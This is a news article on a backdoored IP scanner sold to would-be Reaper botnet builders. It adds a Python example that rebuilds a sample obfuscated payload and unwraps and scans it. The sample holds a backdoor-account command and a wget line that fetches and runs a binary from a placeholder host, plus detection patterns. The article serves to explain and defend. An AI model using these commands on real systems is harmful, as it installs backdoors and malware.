Hackers Target Aspiring Reaper Botnet Creators with Backdoored Tools

Hackers Trick Aspiring Reaper Botnet Creators

A botnet is a network of computers infected with malicious software, allowing attackers to control them remotely. Typically, these networks are used for illegal or unethical activities such as sending spam, brute-forcing passwords, or launching denial-of-service (DoS and DDoS) attacks.

Recently, individuals hoping to create their own Reaper botnet became victims of hackers themselves after downloading a seemingly helpful IP scanner. The Reaper botnet, which gained attention a few weeks ago, differs from others by using an IP scanner to find vulnerable Internet of Things (IoT) devices. Once found, attackers exploit various vulnerabilities to install the Reaper malware. In contrast, botnets like Mirai and Hajime used brute-force attacks to compromise IoT devices.

How the Scam Worked

Taking advantage of the buzz around Reaper, a crafty scammer realized that wannabe hackers would be searching online for tools to build their own botnets. The scammer set up a website advertising an IP scanner—a PHP script that reads IP addresses from a local text file (poop.txt), checks for the presence of a GoAhead server on those devices, and logs positive results to GoAhead-Filtered.txt.

This script attracted attention from those looking to identify devices running GoAhead servers, which are often used in IP surveillance cameras. However, inexperienced or careless hackers who didn’t review the script’s source code failed to notice that most of it was obfuscated with a wall of random characters.

Discovery of the Backdoor

The issue was discovered by Ankit Anubhav, a senior researcher at NewSky Security. According to Anubhav, the script was encoded multiple times using ROT13 and base64, and compressed with gzip. After unwrapping those layers, he found a backdoor that was easy to miss because of the obfuscation.

The script consisted of four parts:

  • The first part was the promised fully functional IP scanner.
  • The second part executed Bash commands to add an extra user to the Linux server where the victim ran the script.
  • The third part authorized the victim’s IP address on a remote server.
  • The fourth part downloaded and executed Kaiten malware on the server running the IP scanner.

As a result, hackers trying to build their own Reaper botnet ended up becoming part of the Kaiten botnet instead.
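To show how layered ROT13/base64/gzip wrapping can be peeled back and the unwrapped script checked for the four behaviours listed above, here is an added Python example; it is not code from the article or from NewSky Security. The sample payload, the layer order (gzip, then base64, then ROT13) and the indicator patterns are my assumptions, constructed for illustration.

```python
import base64
import codecs
import gzip
import re

# Constructed stand-in for the backdoored scanner (not the real script):
# a scanner stub followed by the planted user-add and payload-drop commands.
INNER_PHP = (
    "<?php\n$ips = file('poop.txt');\n"
    "foreach ($ips as $ip) { /* probe GoAhead, log to GoAhead-Filtered.txt */ }\n"
    "shell_exec('useradd -m support && echo support:pw | chpasswd');\n"
    "shell_exec('wget http://example.invalid/k -O /tmp/k && chmod +x /tmp/k && /tmp/k');\n"
)

def wrap_once(text):
    """One obfuscation layer: gzip -> base64 -> ROT13 (layer order is an assumption)."""
    return codecs.encode(base64.b64encode(gzip.compress(text.encode())).decode(), "rot_13")

def build_sample(layers=2):
    """Nest the sample script inside the given number of layers."""
    blob = INNER_PHP
    for _ in range(layers):
        blob = wrap_once(blob)
    return blob

def unwrap(blob, max_layers=10):
    """Peel layers until the remaining text is no longer a wrapped payload."""
    peeled = []
    for _ in range(max_layers):
        try:
            raw = base64.b64decode(codecs.decode(blob, "rot_13"), validate=True)
            if raw[:2] != b"\x1f\x8b":  # not a gzip member, so the last layer is gone
                break
            blob = gzip.decompress(raw).decode()
            peeled.append("rot13+base64+gzip")
        except Exception:  # rot13'd text that is not valid base64, bad gzip, non-UTF-8
            break
    return blob, peeled

# Indicators of the behaviour described in the article, checked on the unwrapped text.
SUSPICIOUS = {
    "adds_user": r"\b(useradd|adduser|chpasswd)\b",
    "drops_payload": r"\b(wget|curl)\b.*\bchmod\s+\+x\b",
    "executes_shell": r"\b(shell_exec|exec|system|passthru)\s*\(",
}

def triage(blob):
    """Unwrap and report which indicators fire; a clean scanner fires none."""
    text, peeled = unwrap(blob)
    return {"layers": len(peeled), "hits": {k: bool(re.search(p, text)) for k, p in SUSPICIOUS.items()}}
```

Any hit on the unwrapped text is reason enough to refuse to run a downloaded script; a genuine scanner has no business creating users or fetching and executing binaries.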

Aftermath

At the time of reporting, the website advertising the IP scanner was already offline. However, according to Anubhav, scammers continue to sell their backdoored product on hacker forums.
